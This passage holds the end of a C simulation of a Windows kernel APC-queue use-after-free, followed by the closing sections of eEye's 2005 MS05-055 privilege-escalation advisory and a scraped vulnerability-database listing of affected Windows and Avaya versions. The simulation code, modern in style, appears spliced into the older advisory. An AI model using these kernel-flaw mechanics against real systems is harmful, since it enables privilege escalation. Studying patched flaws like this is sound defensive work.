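    if (hardened) { first = sim_flush_hardened(head, &priv); stop = &priv; }
    else          { first = sim_flush_vulnerable(head);      stop = first; }
    e = first;
    do {
        sim_list_entry *next = e->Flink;   /* read before the free, as the real loop must */
        sim_free_pool(e);
        e = next;
    } while (e != stop && sim_log.count < 8);
    return sim_log.count;
}
int sim_data_freed(void) { return sim_log.data_free; }   /* 1 if ETHREAD memory was freed */

int main(void) {
    int n = sim_run(0), d = sim_data_freed();
    printf("vulnerable flush: %d frees, ETHREAD freed: %d\n", n, d);
    n = sim_run(1); d = sim_data_freed();
    printf("hardened flush:   %d frees, ETHREAD freed: %d\n", n, d);
    return 0;
}
```

The vulnerable run records three frees, the third inside the ETHREAD model (the "ExFreePool(ETHREAD + 30h)" step of the call flow), while the hardened flush frees only the two APC nodes.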

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability.  The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/MS05-055.mspx

Credit:
Derek Soeder

Greetings:
Dedicated to

R. W. S., Sr.
1928 - 2005

From my father to his:

"He was a good man; liked by all, loved by many.  He was always upbeat,
outgoing and loved to kid around.  He was always willing to help others
in their time of need and gave a lot of himself.  He was very creative,
handy with tools, and could fix about anything.  He was the one everyone
turned to for advice and direction.  He was my father, and I miss him
dearly."

Copyright (c) 1998-2005 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express
consent of eEye.  If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice.  Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information.  In no event shall the author be liable for any direct or
indirect damages whatsoever arising out of or in connection with the use
or spread of this information.  Any use of this information is at the
user's own risk.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- Vulnerability information

18823
Microsoft Windows Kernel APC Queue Manipulation Local Privilege Escalation
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

2005-12-13 Unknown
Unknown 2005-12-13

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Microsoft Windows Asynchronous Procedure Call Local Privilege Escalation Vulnerability
Design Error 15826
No Yes
2005-12-13 12:00:00 2009-07-12 05:56:00
Derek Soeder is credited for the discovery of this issue.

- Affected program versions

Nortel Networks Centrex IP Element Manager 9.0
Nortel Networks Centrex IP Element Manager 8.0
Nortel Networks Centrex IP Element Manager 7.0
Nortel Networks Centrex IP Element Manager 2.5
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6a
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0 alpha
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows NT 4.0 SP6a alpha
Microsoft Windows NT 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Terminal Server 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT 4.0 SP6 alpha
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5 alpha
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4 alpha
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT 4.0 SP3 alpha
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2 alpha
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1 alpha
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0 alpha
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Avaya Unified Communications Center S3400
Avaya S8100 Media Servers R9
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R12
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers 0
Avaya Modular Messaging (MAS)
Avaya IP600 Media Servers R9
Avaya IP600 Media Servers R8
Avaya IP600 Media Servers R7
Avaya IP600 Media Servers R6
Avaya IP600 Media Servers R12
Avaya IP600 Media Servers R11
Avaya IP600 Media Servers R10
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers R9
Avaya DefinityOne Media Servers R8
Avaya DefinityOne Media Servers R7
Avaya DefinityOne Media Servers R6
Avaya DefinityOne Media Servers R12
Avaya DefinityOne Media Servers R11
Avaya DefinityOne Media Servers R10
Avaya DefinityOne Media Servers

- Vulnerability discussion

Microsoft Windows is susceptible to a local privilege-escalation vulnerability. This issue is due to a flaw in the Asynchronous Procedure Calls implementation in Microsoft Windows.

This issue allows local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.

- Exploit

An exploit by SoBeIt is available:

- Solution

Avaya has released advisory ASA-2005-234 detailing affected Avaya products. Please see the referenced advisory for further information.

An advisory and fixes are available from the vendor:


Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows 2000 Server SP4

- References

 

 
